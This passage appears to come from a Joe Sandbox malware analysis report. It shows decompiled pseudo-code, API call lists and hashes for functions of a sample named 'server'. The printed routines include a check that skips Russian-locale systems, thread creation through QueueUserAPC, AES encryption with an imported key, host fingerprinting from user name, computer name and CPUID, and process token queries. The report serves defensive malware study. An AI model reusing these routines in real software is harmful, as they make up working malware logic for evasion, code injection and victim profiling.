				void* _t48;
				intOrPtr _t50;
				signed int _t57;
				signed int _t58;
				long _t63;
				long _t65;
				intOrPtr _t66;
				void* _t71;
				void* _t75;
				signed int _t77;
				signed int _t78;
				void* _t82;
				intOrPtr* _t83;

				_t28 = E00401D68();
				_v8 = _t28;
				if(_t28 != 0) {
					return _t28;
				}
				do {
					_t77 = 0;
					_v12 = 0;
					_t63 = 0x30;
					do {
						_t71 = E004012E6(_t63);
						if(_t71 == 0) {
							_v8 = 8;
						} else {
							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
							_t67 = _t57;
							_t58 = _t57 & 0x0000ffff;
							_v8 = _t58;
							if(_t58 == 4) {
								_t63 = _t63 + 0x30;
							}
							_t78 = 0x13;
							_t10 = _t67 + 1; // 0x1
							_t77 =  *_t71 % _t78 + _t10;
							E00401BA9(_t71);
						}
					} while (_v8 != 0);
					_t30 = E00401688(_t77); // executed
					_v8 = _t30;
					Sleep(_t77 << 4); // executed
					_t31 = _v8;
				} while (_t31 == 0x15);
				if(_t31 != 0) {
					L30:
					return _t31;
				}
				_v12 = 0;
				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
				if(_t33 == 0) {
					__imp__GetSystemDefaultUILanguage();
					_t67 =  &_v12;
					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
				}
				if(_v12 == 0x5552) {
					L28:
					_t31 = _v8;
					if(_t31 == 0xffffffff) {
						_t31 = GetLastError();
					}
					goto L30;
				} else {
					if(E00401800(_t67,  &_v16) != 0) {
						 *0x404178 = 0;
						L20:
						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
						_t82 = _t37;
						if(_t82 == 0) {
							L27:
							_v8 = GetLastError();
							goto L28;
						}
						_t40 = QueueUserAPC(E0040139F, _t82,  &_v40); // executed
						if(_t40 == 0) {
							_t65 = GetLastError();
							TerminateThread(_t82, _t65);
							CloseHandle(_t82);
							_t82 = 0;
							SetLastError(_t65);
						}
						if(_t82 == 0) {
							goto L27;
						} else {
							_t41 = WaitForSingleObject(_t82, 0xffffffff);
							_v8 = _t41;
							if(_t41 == 0) {
								GetExitCodeThread(_t82,  &_v8);
							}
							CloseHandle(_t82);
							goto L28;
						}
					}
					_t66 = _v16;
					_t83 = __imp__GetLongPathNameW;
					_t48 =  *_t83(_t66, 0, 0); // executed
					_t75 = _t48;
					if(_t75 == 0) {
						L18:
						 *0x404178 = _t66;
						goto L20;
					}
					_t22 = _t75 + 2; // 0x2
					_t50 = E004012E6(_t75 + _t22);
					 *0x404178 = _t50;
					if(_t50 == 0) {
						goto L18;
					}
					 *_t83(_t66, _t50, _t75); // executed
					E00401BA9(_t66);
					goto L20;
				}
			}

0x004019f7
0x004019fc
0x00401a01
0x00401ba8
0x00401ba8
0x00401a0a
0x00401a0a
0x00401a0e
0x00401a11
0x00401a12
0x00401a18
0x00401a1c
0x00401a53
0x00401a1e
0x00401a26
0x00401a2c
0x00401a2e
0x00401a33
0x00401a39
0x00401a3b
0x00401a3b
0x00401a42
0x00401a48
0x00401a48
0x00401a4c
0x00401a4c
0x00401a5a
0x00401a61
0x00401a6a
0x00401a6d
0x00401a73
0x00401a76
0x00401a7f
0x00401ba4
0x00000000
0x00401ba6
0x00401a92
0x00401a95
0x00401a9d
0x00401a9f
0x00401aaa
0x00401ab2
0x00401ab2
0x00401ac0
0x00401b96
0x00401b96
0x00401b9c
0x00401b9e
0x00401b9e
0x00000000
0x00401ac6
0x00401ad1
0x00401b0f
0x00401b15
0x00401b27
0x00401b2d
0x00401b31
0x00401b8d
0x00401b93
0x00000000
0x00401b93
0x00401b3d
0x00401b4b
0x00401b53
0x00401b57
0x00401b5e
0x00401b61
0x00401b63
0x00401b63
0x00401b6b
0x00000000
0x00401b6d
0x00401b70
0x00401b76
0x00401b7b
0x00401b82
0x00401b82
0x00401b89
0x00000000
0x00401b89
0x00401b6b
0x00401ad3
0x00401ad8
0x00401adf
0x00401ae1
0x00401ae5
0x00401b07
0x00401b07
0x00000000
0x00401b07
0x00401ae7
0x00401aec
0x00401af1
0x00401af8
0x00000000
0x00000000
0x00401afd
0x00401b00
0x00000000
0x00401b00

APIs

Part of subcall function 00401D68: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
Part of subcall function 00401D68: GetVersion.KERNEL32 ref: 00401D86
Part of subcall function 00401D68: GetCurrentProcessId.KERNEL32 ref: 00401DA2
Part of subcall function 00401D68: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB

Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2

NtQuerySystemInformation.NTDLL ref: 00401A26
Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 00401B27
QueueUserAPC.KERNELBASE(0040139F,00000000,?,?,00000000), ref: 00401B3D
GetLastError.KERNEL32(?,00000000), ref: 00401B4D
TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B57
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B5E
SetLastError.KERNEL32(00000000,?,00000000), ref: 00401B63
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401B70
GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B82
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B89
GetLastError.KERNEL32(?,00000000), ref: 00401B8D
GetLastError.KERNEL32(?,00000000), ref: 00401B9E

Memory Dump Source

Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
String ID:
API String ID: 3475612337-0
Opcode ID: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
Instruction ID: e4abbca9115d716754b6864e37b0832fe911a2439c52af45cdd796d0275508de
Opcode Fuzzy Hash: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
Instruction Fuzzy Hash: 4E519E71901214ABE721AFA59D48EAFBA7CAB45755F104177F901F32A0EB389A40CB68

Uniqueness

Uniqueness Score: -1.00%

Function 047E1508 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E047E1508(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				void* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				void* _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				void* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x47ea0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x47ea0e4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E047E33DC(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 =  *0x47ea0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x47ea0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 = _t102 + _t90;
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E047E61DA(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x047e1511
0x047e1517
0x047e151a
0x047e1520
0x047e1520
0x047e1522
0x047e1524
0x047e1527
0x047e152d
0x047e152e
0x047e152f
0x047e1535
0x047e153a
0x047e1540
0x047e1548
0x047e16a5
0x047e154e
0x047e1550
0x047e1559
0x047e155e
0x047e1570
0x047e1573
0x047e1577
0x047e157e
0x047e1582
0x047e158a
0x047e1690
0x047e1590
0x047e1590
0x047e1594
0x047e1595
0x047e1597
0x047e15a2
0x047e167c
0x047e15a8
0x047e15a8
0x047e15ab
0x047e15b1
0x047e15b7
0x047e15b7
0x047e15bf
0x047e15c1
0x047e15c6
0x047e166d
0x047e15cc
0x047e15d2
0x047e15d5
0x047e15d8
0x047e15da
0x047e15db
0x047e15e0
0x047e15e2
0x047e15e2
0x047e15ec
0x047e15f1
0x047e15f4
0x047e15f7
0x047e15f9
0x047e1602
0x047e162c
0x047e1604
0x047e1615
0x047e1615
0x047e1634
0x00000000
0x00000000
0x047e1636
0x047e1639
0x047e163c
0x047e1640
0x00000000
0x047e1642
0x047e1651
0x047e1657
0x047e165f
0x047e165f
0x00000000
0x047e1640
0x047e1644
0x047e164a
0x047e164f
0x047e1666
0x00000000
0x00000000
0x00000000
0x047e164f
0x047e15c6
0x047e167f
0x047e1682
0x047e1682
0x047e1697
0x047e1697
0x047e16af

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,047E5088,00000001,047E3ECE,00000000), ref: 047E1540
memcpy.NTDLL(047E5088,047E3ECE,00000010,?,?,?,047E5088,00000001,047E3ECE,00000000,?,047E66D9,00000000,047E3ECE,?,76B5C740), ref: 047E1559
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 047E1582
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 047E159A
memcpy.NTDLL(00000000,76B5C740,05429600,00000010), ref: 047E15EC
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05429600,00000020,?,?,00000010), ref: 047E1615
GetLastError.KERNEL32(?,?,00000010), ref: 047E1644
GetLastError.KERNEL32 ref: 047E1676
CryptDestroyKey.ADVAPI32(00000000), ref: 047E1682
GetLastError.KERNEL32 ref: 047E168A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 047E1697
GetLastError.KERNEL32(?,?,?,047E5088,00000001,047E3ECE,00000000,?,047E66D9,00000000,047E3ECE,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E169F

Strings

@MetNet, xrefs: 047E1644, 047E1676, 047E168A, 047E169F

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
String ID: @MetNet
API String ID: 3401600162-2109406137
Opcode ID: 32f542c332a94904128dc0d34b9b5e65bae7b954120b4b2e6fb0230d9559bb2a
Instruction ID: 681ddcf83e2e79da15e6500c3bc36cc23806c9203a028502e1637b5b7756a819
Opcode Fuzzy Hash: 32f542c332a94904128dc0d34b9b5e65bae7b954120b4b2e6fb0230d9559bb2a
Instruction Fuzzy Hash: AC516BB1900209FFDB10DFA6CC89AEE7BB9FB08340F448629F915E6240E7749E14DB60

Uniqueness

Uniqueness Score: -1.00%

Function 047E3BD3 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E047E3BD3(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x47ea310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E047E71CD( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x47ea344 ^ 0x6c7261ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x47ea2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E047E56B9(_v8 + _v8, _t64);
							}
							HeapFree( *0x47ea2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x47ea2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E047E56B9(_v8 + _v8, _t64);
						}
						HeapFree( *0x47ea2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x047e3bd3
0x047e3bdb
0x047e3bdf
0x047e3be2
0x047e3be7
0x047e3be9
0x047e3bee
0x047e3bee
0x047e3bf4
0x047e3bf6
0x047e3c03
0x047e3c64
0x047e3c05
0x047e3c0a
0x047e3c10
0x047e3c15
0x047e3c23
0x047e3c27
0x047e3c36
0x047e3c3d
0x047e3c44
0x047e3c44
0x047e3c4f
0x047e3c4f
0x047e3c27
0x047e3c15
0x047e3c66
0x047e3c6c
0x047e3c76
0x047e3c78
0x047e3c7d
0x047e3c8c
0x047e3c90
0x047e3c9b
0x047e3ca2
0x047e3ca9
0x047e3ca9
0x047e3cb5
0x047e3cb5
0x047e3c90
0x047e3cc0
0x047e3cc2
0x047e3cc5
0x047e3cc7
0x047e3cca
0x047e3ccd
0x047e3cd7
0x047e3cdb
0x047e3cdf

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 047E3C0A
RtlAllocateHeap.NTDLL(00000000,?), ref: 047E3C21
GetUserNameW.ADVAPI32(00000000,?), ref: 047E3C2E
HeapFree.KERNEL32(00000000,00000000), ref: 047E3C4F
GetComputerNameW.KERNEL32(00000000,00000000), ref: 047E3C76
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 047E3C8A
GetComputerNameW.KERNEL32(00000000,00000000), ref: 047E3C97
HeapFree.KERNEL32(00000000,00000000), ref: 047E3CB5

Strings

Uet, xrefs: 047E3C4F, 047E3CB5

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Uet
API String ID: 3239747167-2766386878
Opcode ID: 54d54c34bb629916fe833c15dcf24cc2b55ccfa3f294ad05b3c9954166dd8f96
Instruction ID: 789a1d6462c3b0267a13a5d9e76fbb5e5f932ce2ecc422b881def30bd11c2175
Opcode Fuzzy Hash: 54d54c34bb629916fe833c15dcf24cc2b55ccfa3f294ad05b3c9954166dd8f96
Instruction Fuzzy Hash: F6312AB2A00205EFD710DFAACD81ABAB7F9EB8C700F518629E905D7250E734EE149B10

Uniqueness

Uniqueness Score: -1.00%

Function 047E421F Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E047E421F(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E047E33DC(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E047E61DA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x047e422c
0x047e422d
0x047e422e
0x047e422f
0x047e4230
0x047e4234
0x047e423b
0x047e424a
0x047e424d
0x047e4250
0x047e4257
0x047e425a
0x047e425d
0x047e4260
0x047e4263
0x047e426e
0x047e4270
0x047e4279
0x047e4281
0x047e4283
0x047e4295
0x047e429f
0x047e42a3
0x047e42b2
0x047e42b6
0x047e42bf
0x047e42c7
0x047e42c7
0x047e42c9
0x047e42c9
0x047e42d1
0x047e42d7
0x047e42db
0x047e42db
0x047e42e6

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 047E4266
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 047E4279
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 047E4295

Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 047E42B2
memcpy.NTDLL(?,00000000,0000001C), ref: 047E42BF
NtClose.NTDLL(?), ref: 047E42D1
NtClose.NTDLL(00000000), ref: 047E42DB

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 2a75af634d72ed9e539de7d56440f082198720d19d4f68538855bde46e86ff21
Instruction ID: 5f743865a2791a5221a80d3d2bae757f6c271c83dd55d47715f9e88c32974944
Opcode Fuzzy Hash: 2a75af634d72ed9e539de7d56440f082198720d19d4f68538855bde46e86ff21
Instruction Fuzzy Hash: 012107B290011DBBDF119F96CD84AEEBFBDEB08750F108222FA05E6210D7759B549BA0

Uniqueness

Uniqueness Score: -1.00%

Function 004015B0 Relevance: 10.6, APIs: 7, Instructions: 81
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E004015B0(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00402026();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x404184;
				_push(_t15 + 0x4051ca);
				_push(_t15 + 0x4051c0);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L00402020();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x004015b0
0x004015b9
0x004015bd
0x004015c3
0x004015c8
0x004015cd
0x004015d0
0x004015d3
0x004015d8
0x004015d9
0x004015dc
0x004015e7
0x004015ee
0x004015f2
0x004015f4
0x004015f5
0x004015f8
0x004015fd
0x00401607
0x00401609
0x00401609
0x0040161d
0x00401623
0x00401627
0x00401677
0x00401629
0x00401632
0x00401648
0x00401650
0x00401662
0x00401666
0x00000000
0x00000000
0x00401652
0x00401655
0x0040165a
0x0040165c
0x0040165c
0x0040163d
0x0040163f
0x00401668
0x00401669
0x00401669
0x00401632
0x0040167f

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401418,0000000A,?,?), ref: 004015BD
CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 0040161D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401634
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401648
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401660
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A), ref: 00401669
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401671

Memory Dump Source

Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView
String ID:
API String ID: 3812556954-0
Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
Instruction ID: e8584db34bd0864965919452e9e7a980232bfbaa31af8ac4f809374209f4ae08
Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
Instruction Fuzzy Hash: 1421C8B2500208BFD7119FA4DC84EAF3BACEB44355F14443AFA05F72E0D6758D458B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040110B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040110B(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00401459(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x00401114
0x0040111b
0x0040111c
0x0040111d
0x0040111e
0x0040111f
0x00401130
0x00401134
0x00401148
0x0040114b
0x0040114e
0x00401155
0x00401158
0x0040115f
0x00401162
0x00401165
0x00401168
0x0040116d
0x004011a8
0x0040116f
0x00401172
0x00401178
0x0040117d
0x00401181
0x0040119f
0x00401183
0x0040118a
0x00401198
0x00401198
0x00401181
0x004011b0

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74654EE0,00000000,00000000,?), ref: 00401168

Part of subcall function 00401459: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486

memset.NTDLL ref: 0040118A

Strings

@, xrefs: 00401158

Memory Dump Source

Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
Instruction ID: 902b655066e6f1ef2c1749b59dddf7677aeeae3e3ffa194d207bc0e2506ab0da
Opcode Fuzzy Hash: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
Instruction Fuzzy Hash: 38214DB1D00209AFDB10DFA9C8809EEFBB9FF48314F10453AE616F7250D734AA048B64

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

